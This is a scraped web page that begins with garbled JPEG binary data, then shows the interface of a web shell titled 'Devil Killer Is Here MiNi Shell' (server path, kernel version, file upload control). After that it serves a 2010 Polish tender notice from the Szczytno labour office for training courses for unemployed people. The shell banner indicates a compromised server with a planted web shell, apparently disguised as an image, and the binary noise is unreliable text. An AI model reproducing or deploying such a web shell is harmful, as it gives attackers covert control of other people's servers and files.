JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100929/311658-N-2010.html

<p class="kh_header"><b>Szczytno: Usługi szkoleniowe dla skierowanych osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Szczytnie.</b><br>
<b>Numer ogłoszenia: 311658 - 2010; data zamieszczenia: 29.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Szczytnie , ul. Ogrodowa 17, 12-100 Szczytno, woj. warmińsko-mazurskie, tel. 0-89 6243287, faks 0-89 6243287.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczytno.up.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe dla skierowanych osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Szczytnie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi szkoleniowe dla skierowanych osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Szczytnie.
Zamówienie publiczne zalicza się do usług o charakterze niepriorytetowym, zgodnie 
z Rozporządzeniem Prezesa Rady Ministrów z dnia 28 stycznia 2010 r. w sprawie wykazu usług o charakterze priorytetowym i niepriorytetowym (Dz. U. z 2010 r. Nr 12, poz. 68). Zamówienie dotyczy przeprowadzenia, w tym techniczną organizację trzech różnych tematycznie szkoleń, łącznie dla około 52 osób bezrobotnych. 
Zamówienie publiczne zostało podzielone na trzy części, z czego każda część   
stanowi odrębne szkolenie. Dopuszcza się składanie ofert częściowych na wybraną część zamówienia (na wybrany kierunek szkolenia). Wykonawca może złożyć oferty 
na dowolnie wybrane części zamówienia. Każda część będzie oddzielnie oceniana.
W ramach zamówienia publicznego podzielonego na części zostaną przeprowadzone trzy szkolenia w następujących kierunkach:
1)	KURS ZAKŁADANIA I PROWADZENIA WŁASNEJ FIRMY Z PRZYGOTOWANIEM BIZNESPLANU I Z OBSŁUGĄ KOMPUTERA,
2)	KURS UMIEJĘTNOŚCI KOMPUTEROWYCH - EUROPEJSKI CERTYFIKAT 
UMIEJĘTNOŚCI KOMPUTEROWYCH ECDL e-OBYWATEL (e-CITIZEN),
3)	SZKOLENIE OKRESOWE W ZAKRESIE PRAWA JAZDY KATEGORII D..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek posiadania uprawnień 
do organizowania i przeprowadzania szkoleń objętych niniejszym zamówieniem 
(w szczególności, że jest instytucją szkoleniową w rozumieniu ustawy z dnia 
20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy - tekst jednolity: Dz. U. z 2008 r. Nr 69, poz. 415 z późn. zm.), tj. posiada wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej, Zamawiający wymaga 
od Wykonawcy złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp - zgodnie ze wzorem treści przedstawionym w załączniku nr 2 do SIWZ.
Posiadanie przez instytucję szkoleniową aktualnego wpisu do rejestru instytucji szkoleniowych Zamawiający sprawdzi w centralnym rejestrze instytucji szkoleniowych, dostępnym na stronie internetowej www.ris.praca.gov.pl</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, Zamawiający wymaga od Wykonawcy złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp - zgodnie ze wzorem treści przedstawionym w załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia powyższy warunek, Zamawiający wymaga od Wykonawcy złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp - zgodnie ze wzorem treści przedstawionym w załączniku nr 2 do SIWZ. Ponadto Wykonawca musi wykazać, że dysponuje lub będzie dysponował co najmniej następującym sprzętem i maszynami niezbędnymi do wykonania zamówienia:
I część: Kurs zakładania i prowadzenia własnej firmy z przygotowaniem biznesplanu
i z obsługą komputera:
- zapewnienie dwóch pracowni komputerowych wyposażonych 
w minimum 10 komputerów z dostępem do Internetu w każdej sali + 1 komputer dla instruktora zajęć w każdej sali, aby każdy uczestnik szkolenia miał zapewnione samodzielne stanowisko komputerowe (łącznie 22 komputery).
II część: Kurs umiejętności komputerowych - Europejski Certyfikat Umiejętności Komputerowych ECDL e-Obywatel (e-Citizen): 
- zapewnienie dwóch pracowni komputerowych wyposażonych w minimum 10 komputerów z dostępem do Internetu w każdej sali + 1 komputer dla instruktora zajęć w każdej sali, aby każdy uczestnik szkolenia miał zapewnione samodzielne stanowisko komputerowe (łącznie 22 komputery).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia powyższy warunek, Zamawiający wymaga od Wykonawcy złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp - zgodnie ze wzorem treści przedstawionym w załączniku nr 2 do SIWZ. Ponadto Wykonawca musi wykazać, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia o co najmniej następujących kwalifikacjach i doświadczeniu (niniejsze warunki udziału w postępowaniu dla poszczególnej części zamówienia należy spełniać łącznie):
I część: Kurs zakładania i prowadzenia własnej firmy z przygotowaniem biznesplanu
i z obsługą komputera:	
- posiadanie przez każdego wykładowcę, instruktora wykształcenia wyższego - z tytułem minimum licencjat, inżynier lub studiów podyplomowych lub uprawnień zawodowych - zgodnych z kierunkiem szkolenia lub z prowadzonym przedmiotem, 
- do prowadzenia zajęć z coachingu należy zapewnić trenera posiadającego wykształcenie wyższe magisterskie o kierunku psychologia lub zarządzanie,
- zapewnienie co najmniej jednego wykładowcy prowadzącego obecnie 
lub w okresie ostatnich 3 lat przed upływem terminu składania ofert własną działalność gospodarczą,
- posiadanie przez każdego wykładowcę, instruktora co najmniej 3-letniego doświadczenia zawodowego w okresie ostatnich 5 lat przed upływem terminu składania ofert, zgodnego z kierunkiem szkolenia lub z prowadzonym przedmiotem,
- posiadanie przez każdego wykładowcę, instruktora doświadczenia w prowadzeniu zajęć w formach pozaszkolnych dla osób dorosłych, polegającego na udziale 
w prowadzeniu zajęć w co najmniej 2 szkoleniach, w okresie ostatnich 5 lat przed upływem terminu składania ofert.
II część: Kurs umiejętności komputerowych - Europejski Certyfikat Umiejętności Komputerowych ECDL e-Obywatel (e-Citizen): 
- posiadanie przez każdego wykładowcę, instruktora wykształcenia wyższego - z tytułem minimum licencjat, inżynier lub studiów podyplomowych lub uprawnień zawodowych - zgodnych lub pokrewnych z kierunkiem szkolenia lub z prowadzonym przedmiotem, 
- zapewnienie co najmniej dwóch wykładowców posiadających certyfikat Egzaminatora ECDL e-Obywatel (e-Citizen),
- posiadanie przez każdego wykładowcę, instruktora co najmniej 3-letniego doświadczenia zawodowego w okresie ostatnich 5 lat przed upływem terminu składania ofert, zgodnego z kierunkiem szkolenia lub z prowadzonym przedmiotem,
- posiadanie przez każdego wykładowcę, instruktora doświadczenia w prowadzeniu zajęć w formach pozaszkolnych dla osób dorosłych, polegającego na udziale 
w prowadzeniu zajęć w co najmniej 2 szkoleniach, w okresie ostatnich 5 lat przed upływem terminu składania ofert.
III część: Szkolenie okresowe w zakresie prawa jazdy kategorii D:	
- posiadanie przez każdego wykładowcę, instruktora wykształcenia wyższego - z tytułem minimum licencjat, inżynier lub studiów podyplomowych lub uprawnień zawodowych - zgodnych lub pokrewnych z kierunkiem szkolenia lub z prowadzonym przedmiotem, 
- posiadanie przez każdego wykładowcę, instruktora co najmniej 3-letniego doświadczenia zawodowego w okresie ostatnich 5 lat przed upływem terminu składania ofert, zgodnego z kierunkiem szkolenia lub z prowadzonym przedmiotem,
- posiadanie przez każdego wykładowcę, instruktora doświadczenia w prowadzeniu zajęć w formach pozaszkolnych dla osób dorosłych, polegającego na udziale 
w prowadzeniu zajęć w co najmniej 2 szkoleniach, w okresie ostatnich 5 lat przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek znajdowania się w sytuacji ekonomicznej  i finansowej zapewniającej wykonanie zamówienia, Zamawiający wymaga od Wykonawcy złożenia  oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp - zgodnie ze wzorem treści przedstawionym w załączniku nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) sporządzony przez Wykonawcę według wzoru podanego w załączniku nr 1 
do SIWZ FORMULARZ OFERTY SZKOLENIA,
2) pełnomocnictwo do występowania w imieniu Wykonawcy - w oryginale lub poświadczone notarialnie - w przypadku gdy dokumenty i oświadczenia składające się na ofertę podpisuje osoba nieuprawniona do reprezentowania Wykonawcy, zgodnie z odpisem z Krajowego Rejestru Sądowego lub z zaświadczeniem o wpisie 
do ewidencji działalności gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40.0</li>
<li>2 - Program szkolenia i metodyka nauczania - 20.0</li>
<li>3 - Kwalifikacje kadry dydaktycznej - 20.0</li>
<li>4 - Baza lokalowa, jej wyposażenie, sprzęt i materialy dydaktyczne - 15.0</li>
<li>5 - Akredytacja kuratora oświaty na określony kierunek szkolenia - 5.0</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art. 144 ust. 1 ustawy Pzp Zamawiający określa następujące okoliczności, które mogą powodować konieczność wprowadzenia istotnych zmian w treści zawartej umowy w stosunku do treści złożonej oferty: 
- zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy, np. w przypadku problemów z rekrutacją kandydatów na poszczególne kierunki szkoleń;
- zmiana ceny szkolenia przysługująca instytucji szkoleniowej, przy zachowaniu jednostkowej kalkulacji kosztów zawartej w ofercie szkolenia - w przypadku zmiany liczby osób bezrobotnych objętych szkoleniem - która w ciągu 14 dni od dnia rozpoczęcia szkolenia może się zwiększyć lub zmniejszyć, jednakże grupa szkoleniowa nie może liczyć mniej niż 10 osób i nie więcej niż 20 osób;
- zmiana kadry dydaktycznej zaangażowanej w realizację szkolenia, wyłącznie 
w przypadku wystąpienia udokumentowanych nadzwyczajnych okoliczności uniemożliwiających prowadzenie zajęć szkoleniowych przez wskazanego w ofercie wykładowcę, trenera, instruktora (w szczególności z powodu choroby, wypadku 
czy śmieci osoby), pod warunkiem złożenia przez Wykonawcę pisemnego wniosku w tej sprawie i po akceptacji przez Zamawiającego. Zaproponowana osoba powinna posiadać - na dzień składania ofert - co najmniej takie same kwalifikacje i doświadczenie zawodowe jak wykładowca, który ma zostać zastąpiony;
- zmiana harmonogramu zajęć - w uzasadnionych przypadkach - pod warunkiem złożenia przez Wykonawcę pisemnego wniosku w tej sprawie i po akceptacji przez Zamawiającego;
- wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczytno.up.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Szczytnie
ul. Ogrodowa 17, 12-100 Szczytno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.10.2010 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Szczytnie
ul. Ogrodowa 17, 12-100 Szczytno 
sekretariat - pokój nr 13 (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KURS ZAKŁADANIA I PROWADZENIA WŁASNEJ FIRMY Z PRZYGOTOWANIEM BIZNESPLANU I Z OBSŁUGĄ KOMPUTERA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest promowanie idei przedsiębiorczości, wykształcenie i wzmocnienie postaw przedsiębiorczych wśród osób bezrobotnych oraz przygotowanie uczestników szkolenia do założenia, a następnie samodzielnego prowadzenia własnej działalności gospodarczej.
Zakres tematyczny szkolenia powinien obejmować następujące moduły szkoleniowe:
I. Trening interpersonalny (17 godzin). 
Zajęcia powinny obejmować m.in. trening motywacyjny i gotowości do zmian nastawiony na zmianę postaw, podniesienie motywacji na rozwój kompetencji interpersonalnych i doskonalenie cech przedsiębiorczych. Zajęcia te powinny odbywać się głównie w formie ćwiczeń i warsztatów. 
UWAGA!  Trening interpersonalny powinien zostać przeprowadzony na początku szkolenia, przed przystąpieniem do realizacji pozostałych modułów szkoleniowych, w celu integracji grupy szkoleniowej i wzmocnienia motywacji do aktywnego uczestnictwa w szkoleniu. 
II. Coaching (3 godziny, w tym: 1 godzina na początku modułu oraz 2 godziny w końcowej fazie realizacji szkolenia).
Coaching powinien obejmować indywidualne doradztwo w zakresie rozwoju osobistego i dalszych planów zawodowych.
III. Obowiązujące uregulowania prawno-ekonomiczne dotyczące zakładania i prowadzenia działalności gospodarczej i podstawy organizacji i zarządzania firmą (60 godzin), w tym obowiązkowo: 
1)	kryteria wyboru rodzaju działalności gospodarczej,
2)	procedury prawno-administracyjne dotyczące rejestracji podmiotu gospodarczego - etapy zakładania firmy,
3)	analiza rynku, 
4)	obowiązki przedsiębiorcy względem Urzędu Skarbowego i ZUS, wybór formy opodatkowania, prowadzenie dokumentacji finansowo-księgowej i podatkowej samodzielnego podmiotu gospodarczego, 
5)	zarządzanie strategiczne, 
6)	negocjacje w biznesie,
7)	marketing i promocja w prowadzeniu własnej firmy,
8)	możliwości pozyskiwania środków finansowych z różnych źródeł na założenie i rozwój własnej firmy,
9)	zasady racjonalnego gospodarowania środkami finansowymi w zależności od posiadanego budżetu.                                                                             
Łącznie zagadnienia te muszą obejmować 60 godzin.
IV. Obsługa komputera w prowadzeniu działalności gospodarczej (40 godzin), w tym obowiązkowo: 
1)	obsługa środowiska Windows,
2)	wybrane zagadnienia z pakietu Microsoft Office (w szczególności Word, Excel, Power Point),
3)	obsługa Internetu, 
4)	obsługa programu Płatnik,
5)	obsługa specjalistycznych programów użytkowych wspomagających prowadzenie własnej firmy (minimum dwa programy), m.in. w zakresie prowadzenia księgowości, fakturowania, monitorowania stanu magazynowego.                  Łączna liczba godzin: 40 godzin na każdego uczestnika szkolenia. 
Wykonawca powinien zagwarantować taką ilość komputerów jednocześnie, aby każdy uczestnik szkolenia miał zapewnione samodzielne stanowisko komputerowe. Należy zapewnić dwie pracownie komputerowe wyposażone w minimum 
10 komputerów w każdej sali + 1 komputer dla instruktora zajęć w każdej sali (łącznie 22 komputery). 
V. Warsztaty z zakresu tworzenia i analizy biznesplanów sporządzonych przez uczestników szkolenia (20 godzin).
Każdy uczestnik szkolenia powinien przygotować w formie elektronicznej z wykorzystaniem komputera własny biznesplan pod kątem planowanej działalności gospodarczej, wykorzystując m.in. opracowany przez tutejszy Urząd wniosek o przyznanie bezrobotnemu jednorazowo środków na podjęcie działalności gospodarczej. Aktualny druk wniosku należy pobrać ze strony internetowej Urzędu: www.szczytno.up.gov.pl - zakładka wzory dokumentów. Szczególny nacisk należy położyć na analizę poszczególnych biznesplanów sporządzonych przez uczestników szkolenia oraz wypełnionego wniosku o przyznanie bezrobotnemu środków na podjęcie działalności gospodarczej. Warsztaty powinny być przeprowadzone z podziałem na dwie grupy, maksymalnie 10-osobowe, w pracowniach komputerowych wyposażonych w komputery z dostępem do Internetu dla każdego uczestnika szkolenia.
Łącznie warsztaty te powinny obejmować 20 godzin, 
UWAGA!  Warsztaty z zakresu tworzenia i analizy biznesplanów powinny zostać przeprowadzone po zrealizowaniu III modułu tematycznego (tj. obowiązujące uregulowania prawno-ekonomiczne) i IV modułu z zakresu obsługi komputera..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Program szkolenia i metodyka nauczania - 20.0</li>
<li>3. Kwalifikacje kadry dydaktycznej - 20.0</li>
<li>4. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
